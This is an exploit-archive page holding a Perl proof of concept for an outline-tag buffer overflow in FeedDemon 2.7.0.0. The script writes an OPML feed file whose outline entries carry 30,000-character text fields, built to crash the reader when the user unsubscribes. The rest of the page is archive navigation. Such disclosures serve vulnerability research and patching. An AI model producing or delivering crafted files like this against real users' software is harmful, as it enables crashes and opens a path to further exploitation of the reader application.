FeedDemon 2.7.0.0 Overflow

FeedDemon 2.7.0.0 Overflow: Posted Feb 5, 2009; Authored by Praveen Darshanam; Proof of concept exploit for the FeedMon version 2.7.0.0 outline tag buffer overflow vulnerability.; tags | exploit, overflow, proof of concept; SHA-256 | 36cff8e5f3605de8b129d70a05eacba2f012ba2169b898cb90a83b34a302ab11; Download | Favorite | View

FeedDemon 2.7.0.0 Overflow

#!usr/bin/perl -w

################################################################################
#     Reference:
#        http://security.bkis.vn/?p=329
#        http://www.securityfocus.com/bid/33630/info
#
#    Tested on Windows Server 2003 with FeedMon 2.7.0.0. FeedMon crashes
#    whenever I am trying to Unsubscribe from the malicious(overlylong) feed.
#
#     Thanx to milw0rm, str0ke, security.bkis, @rp m@n, evilfingers
#    and all security researchers.
#
#$$$$$ This was strictly written for educational purpose. Use it at
#$$$$$ your own risk. Author will not bare any responsibility for any
#$$$$$ damages watsoever.
#
#####MOST OF THE CODE I GOT FROM###############################################
#####http://search.cpan.org/~madghoul/XML-OPML-0.26/OPML.pm####################
#
#    Author: Praveen Dar$hanam
#    Visit:
#        http://www.darshanams.blogspot.com/
#        http://www.evilfingers.com/
################################################################################

use XML::OPML;
print "OPML is working fine\n\n";

 my $opml = new XML::OPML(version => "1.1");

 $opml->head(
             title => 'FeedDemon \'outline\' Tag Buffer Overflow Vulnerability PoC',
             dateCreated => 'Thur, 05 Feb 2009 8.55:35:00 IST',
             ownerName => 'Praveen Darshanam',
             ownerEmail => 'praveen_recker@sify.com',
             expansionState => '',
             vertScrollState => '',
             windowTop => '',
             windowLeft => '',
             windowBottom => '',
             windowRight => '',
           );

 $buff="D" x 30000;
 # Malicious buffer which creates overly long text tag

 $opml->add_outline(
                 description => 'Warren Ellis\' Personal Weblog',
                 title => 'Warren Ellis Speaks Clever',
                 text => $buff,
                 type => 'rss',
                 version => 'RSS',
                 htmlUrl => 'http://www.diepunyhumans.com ',
                 xmlUrl => 'http://www.diepunyhumans.com/index.rdf ',
               );

 $opml->add_outline(
                 descriptions => 'The raelity bytes weblog.',
                 title => 'raelity bytes',
                 text => $buff,
                 type => 'rss',
                 version => 'RSS',
                 htmlUrl => 'http://www.raelity.org ',
                 xmlUrl => 'http://www.raelity.org/index.rss10 ',
               );

 $opml->save('malicious_files.opml');

Top Authors In Last 30 Days

Red Hat 226 files
Ubuntu 86 files
Gentoo 31 files
Debian 21 files
tmrswrr 10 files
Sina Kheirkhah 7 files
bRpsd 4 files
Rodolfo Tavares 4 files
nu11secur1ty 3 files
Google Security Research 3 files

File Archives

Systems

AIX (429)
Apple (2,090)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,078)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,531)
HPUX (880)
iOS (376)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (50,374)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,287)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,660)
UNIX (9,426)
UnixWare (187)
Windows (6,666)
Other

FeedDemon 2.7.0.0 Overflow

FeedDemon 2.7.0.0 Overflow

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

FeedDemon 2.7.0.0 Overflow

Share This

FeedDemon 2.7.0.0 Overflow

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems